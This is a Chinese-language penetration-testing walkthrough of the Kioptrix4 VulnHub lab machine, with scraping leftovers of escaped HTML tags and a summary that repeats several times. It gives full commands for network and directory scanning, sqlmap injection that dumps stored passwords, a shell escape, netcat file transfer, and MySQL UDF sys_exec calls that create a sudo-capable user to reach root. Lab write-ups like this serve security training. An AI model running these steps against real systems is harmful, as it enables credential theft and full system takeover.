Kioptrix4 靶机渗透教学文档<\/h1>

靶机安装<\/h2>

从Vulnhub下载Kioptrix4靶机的.vmdk文件<\/li>
新建虚拟机时选择"使用现有磁盘"选项<\/li>
导入下载的.vmdk文件<\/li>

完成虚拟机创建并启动<\/li> <\/ol>

信息收集<\/h2>

网络探测<\/h3>

使用arp-scan<\/code>探测靶机IP地址：<\/p>

arp-scan -l
<\/span><\/span><\/code><\/pre>端口扫描<\/h3>
使用nmap<\/code>进行端口扫描：<\/p>
nmap -sV <靶机IP>
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

22 (SSH)<\/li>
80 (HTTP)<\/li>
<\/ul>
Web目录扫描<\/h3>
使用dirb<\/code>进行目录扫描：<\/p>
dirb http:\/\/<靶机IP>
<\/span><\/span><\/code><\/pre>Web应用分析<\/h2>

访问80端口，发现登录界面<\/li>
尝试常见弱口令无果<\/li>
抓包分析请求（可使用Burp Suite）<\/li>
<\/ol>
SQL注入利用<\/h2>

将抓包数据保存为test.txt<\/code><\/li>
在要测试的字段后添加*<\/code>标记<\/li>
使用sqlmap进行测试：<\/li>
<\/ol>
数据库枚举<\/h3>
获取数据库列表：<\/p>
sqlmap -r test.txt --batch --level 5<\/span> --dbs
<\/span><\/span><\/code><\/pre>发现members<\/code>数据库<\/p>
表枚举<\/h3>
获取members<\/code>数据库中的表：<\/p>
sqlmap -r test.txt --batch --level 5<\/span> -D members --tables
<\/span><\/span><\/code><\/pre>发现members<\/code>表<\/p>
列枚举<\/h3>
获取members<\/code>表的列：<\/p>
sqlmap -r test.txt --batch --level 5<\/span> -D members -T members --columns
<\/span><\/span><\/code><\/pre>发现username<\/code>和password<\/code>列<\/p>
数据提取<\/h3>
提取用户名和密码：<\/p>
sqlmap -r test.txt --batch --level 5<\/span> -D members -T members -C password,username --dump
<\/span><\/span><\/code><\/pre>SSH登录<\/h2>

使用获取的凭据尝试SSH登录<\/li>
如果WSL终端有问题，可使用Termius等SSH客户端<\/li>
<\/ol>
基础提权<\/h2>

进入系统后，发现需要提权<\/li>
使用echo<\/code>命令执行bash：<\/li>
<\/ol>
echo os.system(<\/span>'\/bin\/bash'<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>提权准备<\/h2>

上传LinEnum.sh<\/code>扫描脚本<\/li>
使用netcat传输文件：

攻击机：
nc -lvp 1234<\/span> < LinEnum.sh
<\/span><\/span><\/code><\/pre><\/li>
靶机：
nc <攻击机IP> 1234<\/span> > LinEnum.sh
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
添加执行权限：<\/li>
<\/ol>
chmod +x .\/LinEnum.sh
<\/span><\/span><\/code><\/pre>
运行扫描脚本：<\/li>
<\/ol>
.\/LinEnum.sh
<\/span><\/span><\/code><\/pre>MySQL UDF提权<\/h2>

扫描发现MySQL root用户无密码<\/li>
登录MySQL：<\/li>
<\/ol>
mysql -u root
<\/span><\/span><\/code><\/pre>
查看数据库：<\/li>
<\/ol>
show<\/span> databases;
<\/span><\/span><\/code><\/pre>
切换到mysql数据库：<\/li>
<\/ol>
use mysql;
<\/span><\/span><\/code><\/pre>
查看func表：<\/li>
<\/ol>
select<\/span> *<\/span> from<\/span> func;
<\/span><\/span><\/code><\/pre>发现sys_exec<\/code>函数<\/p>
创建特权用户<\/h2>

创建新用户：<\/li>
<\/ol>
SELECT<\/span> sys_exec('useradd -m -s \/bin\/bash epoch'<\/span>);
<\/span><\/span><\/code><\/pre>
设置密码：<\/li>
<\/ol>
SELECT<\/span> sys_exec('echo "epoch:123456" | chpasswd'<\/span>);
<\/span><\/span><\/code><\/pre>
赋予sudo权限：<\/li>
<\/ol>
SELECT<\/span> sys_exec('usermod -aG sudo epoch'<\/span>);
<\/span><\/span><\/code><\/pre>获取root权限<\/h2>

使用新创建的用户登录：<\/li>
<\/ol>
su - epoch
<\/span><\/span><\/code><\/pre>
验证sudo权限：<\/li>
<\/ol>
sudo -l
<\/span><\/span><\/code><\/pre>
获取root shell：<\/li>
<\/ol>
sudo -i
<\/span><\/span><\/code><\/pre>总结<\/h2>
通过本渗透测试，我们完成了从信息收集到最终获取root权限的全过程，关键点包括：<\/p>

使用sqlmap进行SQL注入利用<\/li>
通过MySQL UDF函数进行提权<\/li>
创建特权用户获取root权限<\/li>
<\/ul>

Kioptrix4 靶机渗透教学文档<\/h1>

信息收集<\/h2>

总结<\/h2> 通过本渗透测试，我们完成了从信息收集到最终获取root权限的全过程，关键点包括：<\/p> 使用sqlmap进行SQL注入利用<\/li> 通过MySQL UDF函数进行提权<\/li> 创建特权用户获取root权限<\/li> <\/ul>

总结<\/h2>
通过本渗透测试，我们完成了从信息收集到最终获取root权限的全过程，关键点包括：<\/p>

使用sqlmap进行SQL注入利用<\/li>
通过MySQL UDF函数进行提权<\/li>
创建特权用户获取root权限<\/li> <\/ul>